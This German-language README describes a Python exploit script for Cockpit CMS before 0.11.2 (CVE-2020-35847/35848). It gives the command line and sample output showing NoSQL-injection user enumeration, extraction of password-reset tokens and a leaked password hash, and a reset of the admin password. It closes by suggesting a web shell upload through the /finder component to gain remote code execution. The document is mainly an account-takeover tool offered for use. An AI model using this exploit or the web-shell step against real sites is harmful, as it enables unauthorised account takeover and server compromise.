
CVE-2020-35847, CVE-2020-35848 : Kontoübernahme
Cockpit CMS vor Version 0.11.2 ist anfällig für eine NoSQL-Injection-Schwachstelle in den Endpunkten /auth/resetpassword und /auth/newpassword, die eine Extraktion von Passwort-Reset-Tokens ermöglicht, was wiederum die Aufzählung von Benutzerdetails sowie das Zurücksetzen von Passwörtern erlaubt.
Weiterlesen - https://swarm.ptsecurity.com/rce-cockpit-cms/
Dieses Python-Skript zählt Benutzer auf dem System auf und setzt das Passwort zurück.
python3 exploit.py -u http://cockpit-site-url
Das Skript zählt zunächst die Benutzer auf dem System auf.
[+] http://cockpit-site-url: ist erreichbar
[-] Versuche Benutzernamen-Aufzählung (CVE-2020-35846):
[+] Benutzer gefunden: ['admin', 'user1', 'user2', 'user3']
Dann können Sie auswählen, zu welchem Benutzer weitere Informationen gesammelt werden sollen. Dabei werden auch Reset-Tokens für diesen Benutzer generiert – eine wesentliche Voraussetzung für das Zurücksetzen des Passworts.
[-] Benutzerdetails abrufen für: admin
[+] Suche nach Passwort-Reset-Tokens
Tokens gefunden: ['rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e']
[+] Benutzerinformationen abrufen
-----------------Details--------------------
[*] Benutzer: admin
[*] Name: Admin
[*] E-Mail: [email protected]
[*] aktiv: True
[*] Gruppe: admin
[*] Passwort: $2y$10$6uQ2PXh4vShH.D4gw..WtO0NHQq7J36ugmwKNtJGzu9p9OqSEpVUW
[*] i18n: en
[*] _created: 1621655201
[*] _modified: 1621655201
[*] _id: 60a87ea165343539ee000300
[*] _reset_token: rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e
[*] md5email: a11eea8bf873a483db461bb169beccec
--------------------------------------------
Abschließend können Sie das Passwort des Benutzers zurücksetzen.
[+] Möchten Sie das Passwort für admin zurücksetzen? (Y/n): y
[-] Versuche, das Passwort von admin zurückzusetzen:
[+] Passwort erfolgreich aktualisiert!
[+] Die neuen Anmeldedaten für admin lauten:
Benutzername: admin
Passwort: new_random_password
Sie können dann eine Webshell auf die /finder-Komponente hochladen, um RCE zu erlangen.